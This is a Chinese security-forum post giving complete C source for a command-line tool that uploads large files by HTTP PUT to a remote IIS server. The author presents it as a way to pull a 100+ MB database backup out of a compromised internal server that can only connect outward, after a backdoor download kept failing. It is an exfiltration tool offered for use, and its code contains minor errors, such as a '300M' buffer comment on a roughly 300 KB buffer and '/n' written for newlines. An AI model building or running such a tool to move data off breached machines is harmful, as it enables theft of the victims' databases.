命令行下的PUT方式上传大文件 's

文章作者：pt007[at]vip.sina.com
信息来源：邪恶八进制信息安全团队(www.eviloctal.com)

注：文章首发I.S.T.O信息安全团队，后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有，转载需注明作者。
最近做一个渗透,目标机为一台数据库服务器,对外没有开放,只能反连出来,上面有个100多M的数据库备份,用后门下载的时候总是掉线,听mickey说用PUT方式可以上传大文件,于是从网上找找了代码,写了个命令行下上传大文件的C程序.

代码:

#include <winsock2.h> #include <windows.h> #include <stdio.h> #include <wininet.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "wininet.lib")  void Usage (char *name);//帮助信息  BOOL UseHttpSendReqEx(HINTERNET hConnect, TCHAR *upFile, TCHAR *localFile) { INTERNET_BUFFERS BufferIn = {0}; DWORD dwBytesRead; DWORD dwBytesWritten; BYTE pBuffer[302480]; // Read from file in 300M chunks,最大支持300M文件  BOOL bRead, bRet;  BufferIn.dwStructSize = sizeof( INTERNET_BUFFERS ); //使用put方式上传文件: HINTERNET hRequest = HttpOpenRequest (hConnect, "PUT", localFile, NULL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, 0); if (!hRequest) { printf("Failed to open request handle: %lu/n", GetLastError ()); return FALSE; }  //打开指定的文件: HANDLE hFile = CreateFile (upFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("/nFailed to open local file %s.", upFile); return FALSE; }  BufferIn.dwBufferTotal = GetFileSize (hFile, NULL); printf ("File size is %d/n", BufferIn.dwBufferTotal );  if(!HttpSendRequestEx( hRequest, &BufferIn, NULL, HSR_INITIATE, 0)) { printf( "Error on HttpSendRequestEx %lu/n",GetLastError() ); return FALSE; }  DWORD sum = 0; do { if  (!(bRead = ReadFile (hFile, pBuffer, sizeof(pBuffer),&dwBytesRead, NULL))) { printf ("/nReadFile failed on buffer %lu.",GetLastError()); break; } if (!(bRet=InternetWriteFile( hRequest, pBuffer, dwBytesRead,&dwBytesWritten))) { printf ("/nInternetWriteFile failed %lu", GetLastError()); break; } sum += dwBytesWritten; } while (dwBytesRead == sizeof(pBuffer)) ;  CloseHandle (hFile); printf ("Actual written bytes: %d/nupload %s successed!/n", sum,localFile);  //结束一个HTTP请求: if(!HttpEndRequest(hRequest, NULL, 0, 0)) { printf( "Error on HttpEndRequest %lu /n", GetLastError()); return FALSE; } return TRUE; }  int main(int argc, char **argv)  { //put 127.0.0.1 /1.db c://wmpub//1.exe if(argc!=4) { Usage(argv[0]); return 0; }  //char *ServerName="127.0.0.1"; //这里填写URL地址 char *ServerName=argv[1];  HINTERNET hSession = InternetOpen("HttpSendRequest",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); //同步方式 if(!hSession){ printf("Failed to open InternetOpen/n"); exit(0); } //连接到一个http服务: HINTERNET hConnect = InternetConnect(hSession, ServerName, INTERNET_DEFAULT_HTTP_PORT, //连接到80端口,可以修改成任意端口,比如53 NULL, NULL, INTERNET_SERVICE_HTTP, //服务类型HTTP，FTP或Gopher 0, 1);  if(!hConnect) { printf("error InternetConnect/n"); return 0; }  //TCHAR *putfile="c://wmpub//1.exe"; //上传的程序 TCHAR *putfile=argv[3]; TCHAR *putlocalfile=argv[2]; BOOL sigh; sigh=UseHttpSendReqEx(hConnect,putfile,putlocalfile); if(!sigh) { printf("error UseHttpSendReqEx/n"); return 0; }  return 0; }  //输出帮助的典型方法: void Usage (char *name) { fprintf(stderr,"===============================================================================/n" "/t名称：利用PUT上传300M的大文件/n" "/t环境：Win2003+Visual C++ 6.0/n" "/t作者：[email protected]/n" "/tQQ：  7491805/n" "/t声明：本软件由pt007原创，转载请注明出处，谢谢!/n" "/t使用说明:1.db为上传后保存后的文件,c://wmpub//1.exe为本地要上传的大文件,/n/t需要IIS里面设置允许写入!/n" "/t例子:%s 192.168.1.101 /1.db c://wmpub//1.exe/n" "===============================================================================/n",name); }

put上传程序.rar